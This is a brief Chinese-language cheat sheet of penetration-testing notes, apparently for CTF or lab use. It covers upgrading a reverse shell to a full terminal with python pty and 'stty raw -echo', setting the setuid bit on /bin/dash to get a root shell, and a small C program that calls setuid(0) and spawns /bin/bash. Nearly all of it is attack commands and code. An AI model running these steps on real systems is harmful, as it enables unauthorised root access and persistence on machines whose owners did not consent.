# 替换文本
%s/{old}/{new}/g
# 间隔符的运用
IFS={xx}
TODO
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo;fg
# 如果不能反弹 shell,别忘了 setuid
chmod 4755 /bin/dash
dash
cd /root/
// 还可以现写命令执行
int main(void)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
// 编译,一定要同目标机器环境一致
gcc exec.c -o exec; chmod 755 exec; .exec